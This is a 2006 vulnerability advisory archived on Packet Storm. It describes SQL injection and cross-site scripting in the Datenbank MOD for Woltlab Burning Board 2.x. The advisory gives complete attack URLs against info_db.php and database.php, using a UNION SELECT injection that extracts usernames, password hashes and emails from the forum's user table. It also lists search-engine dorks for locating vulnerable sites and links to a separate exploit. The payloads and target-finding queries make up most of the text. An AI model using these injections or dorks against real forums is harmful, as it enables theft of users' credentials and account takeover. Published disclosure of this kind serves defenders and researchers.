what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

woltlabBB2x.txt

woltlabBB2x.txt
Posted Mar 3, 2006
Authored by Mustafa Can Bjorn | Site nukedx.com

Woltlab Burning Board 2.x is susceptible to SQL injection and cross site scripting vulnerabilities. Exploitation details provided.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 18fd6802df0d88487bdd015e0ad8c5d9e25eab7575e6e4d94412c4f5808cf937

woltlabBB2x.txt

Change Mirror Download
--Security Report--
Advisory: Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple
Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 01/03/06 01:33 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: WbbCoderForum (http://www.wbbcoderforum.de)
Version: Datenbank MOD 2.7 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
fileid parameter in this mod if
magic_quotes_gpc = on, if magic_quotes_gpc off remote attacker can make
malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Critical
MOD Pages: info_db.php , database.php
---
How&Example:
GPC
GET ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
GET ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
with this examples remote attacker can leak speficied users login information
from database.
---
Timeline:
* 01/03/2006: Vulnerability found.
* 01/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=17
---
Dorks: inurl:info_db.php , inurl:/wbb2/info_db.php , inurl:/board/info_db.php,
inurl:database.php , inurl:/wbb2/database.php , inurl:/board/database.php
allintext:Datenbank Trooper WbbCoderForum.de etc. etc.
---
Original advisory: http://www.nukedx.com/?viewdoc=17

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close